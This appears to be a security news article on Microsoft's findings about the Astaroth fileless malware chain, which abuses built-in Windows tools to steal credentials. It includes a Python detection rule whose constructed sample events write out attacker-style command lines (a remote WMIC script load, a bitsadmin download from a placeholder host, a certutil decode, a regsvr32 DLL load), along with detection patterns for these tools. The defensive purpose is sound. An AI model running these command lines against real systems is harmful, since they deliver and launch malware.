Caution: Microsoft Detects Surge in Astaroth Fileless Malware Attacks

New Campaign Unveils Widespread Distribution of Astaroth Fileless Malware

In a new report from Microsoft, cybersecurity experts reveal the latest details of an extensive campaign involving the notorious Astaroth fileless malware. Initially targeting users in Europe and Brazil earlier this year, this malware has been operational since at least 2017 and is designed to extract sensitive information—including login credentials and keystrokes—without deploying any traditional executable files on the affected systems.

Astaroth, as identified by researchers from Cybereason in February, employs a technique known as “living off the land.” This method enables the malware to execute its payload directly in the memory of the targeted device or through legitimate system utilities such as WMIC, Certutil, Bitsadmin, and Regsvr32. By utilizing these trusted Windows components, Astaroth evades many endpoint security solutions that primarily analyze static files for threats.

The investigation into this threat began when Microsoft’s Andrea Lelli identified a significant increase in the use of the WMIC tool during a routine analysis of Windows telemetry data. This spike led to the uncovering of a multi-stage fileless attack initiated via spear-phishing emails. These emails contained a malicious link that redirected users to a website hosting a deceptive LNK shortcut file. When activated, this shortcut invokes the WMIC tool to download and execute JavaScript code, which in turn uses the Bitsadmin tool to retrieve additional malicious payloads.

These payloads are encoded in Base64 and subsequently decoded using the Certutil tool. Notably, the Regsvr32 utility loads one of the decoded Dynamic Link Libraries (DLLs), which decrypts and loads further files until the final Astaroth payload is loaded into the Userinit process. This chain underscores that Astaroth does not rely on exploiting vulnerabilities or traditional trojan tactics; it strictly uses built-in system tools, masking its activity as routine system operation.

As a result, the Astaroth malware can stealthily access the target system, stealing vital user information and transmitting it to a remote server controlled by the attackers. This data can be leveraged for lateral movement within networks or for financial fraud, strengthening the attackers' position in the cybercriminal ecosystem.

According to Microsoft, its Defender ATP solution can detect fileless malware attacks at various stages of infection, providing a level of protection that traditional file-centric security measures do not offer. Lelli emphasized that “being fileless doesn’t mean being invisible; it certainly doesn’t mean being undetectable.” Hence, while Astaroth adopts advanced evasion tactics, it leaves behind a trail of forensic evidence that can be leveraged for future defensive measures.
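The telemetry angle Lelli describes can be illustrated with a small correlation rule over process-creation events. The example below is added here and is not Microsoft's or Cybereason's code; the events are constructed samples, the tool names follow the chain described above, and the command-line patterns and host names are assumptions. A single WMIC or Certutil invocation is ordinary administration, so the rule only flags a host where several distinct stages of the chain appear together.

```python
import re
from collections import defaultdict

# Constructed sample process-creation events (not real telemetry):
# (host, parent_image, image, command_line)
SAMPLE_EVENTS = [
    ("ws01", "explorer.exe", "wmic.exe", "wmic os get /format:\"http://example.invalid/x.xsl\""),
    ("ws01", "wmic.exe", "bitsadmin.exe", "bitsadmin /transfer job /download http://example.invalid/p C:\\Users\\Public\\p.txt"),
    ("ws01", "wmic.exe", "certutil.exe", "certutil -decode C:\\Users\\Public\\p.txt C:\\Users\\Public\\p.dll"),
    ("ws01", "wmic.exe", "regsvr32.exe", "regsvr32 /s C:\\Users\\Public\\p.dll"),
    ("ws02", "cmd.exe", "wmic.exe", "wmic computersystem get model"),
    ("ws02", "cmd.exe", "certutil.exe", "certutil -hashfile C:\\Windows\\notepad.exe SHA256"),
]

# One entry per stage of the chain described in the article: the living-off-the-land
# tool involved and a command-line pattern that distinguishes the stage from benign use.
STAGES = {
    "wmic_remote_script": ("wmic.exe", re.compile(r'/format:\s*"?https?://', re.I)),
    "bitsadmin_download": ("bitsadmin.exe", re.compile(r"/transfer\b", re.I)),
    "certutil_decode": ("certutil.exe", re.compile(r"-decode\b", re.I)),
    "regsvr32_user_path": ("regsvr32.exe", re.compile(r"\\Users\\", re.I)),
}


def match_stages(events):
    """Return {host: set of stage names} for events that look like a chain stage."""
    hits = defaultdict(set)
    for host, _parent, image, cmdline in events:
        for name, (tool, pattern) in STAGES.items():
            if image.lower() == tool and pattern.search(cmdline):
                hits[host].add(name)
    return hits


def suspicious_hosts(events, min_stages=2):
    """Hosts on which at least `min_stages` distinct chain stages were observed.

    The combination of stages, not any single tool, is what characterises the
    Astaroth-style fileless chain; benign hosts typically trip at most one."""
    return {host: sorted(stages)
            for host, stages in match_stages(events).items()
            if len(stages) >= min_stages}


if __name__ == "__main__":
    for host, stages in suspicious_hosts(SAMPLE_EVENTS).items():
        print(f"{host}: {', '.join(stages)}")
```

On the constructed sample, only ws01 is flagged, with all four stages; ws02's ordinary WMIC and Certutil usage produces no hit.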

For business owners and IT professionals, understanding the use of tactics outlined in the MITRE ATT&CK framework—such as initial access, command and control through legitimate system tools, and data exfiltration—is essential. This knowledge can enhance preventive strategies against such threats and improve overall cybersecurity posture.

To delve deeper into the intricacies of the Astaroth malware, readers are encouraged to access the detailed analysis published on Cybereason’s blog, which sheds light on its operational complexities and the evolving threat landscape that businesses face today.
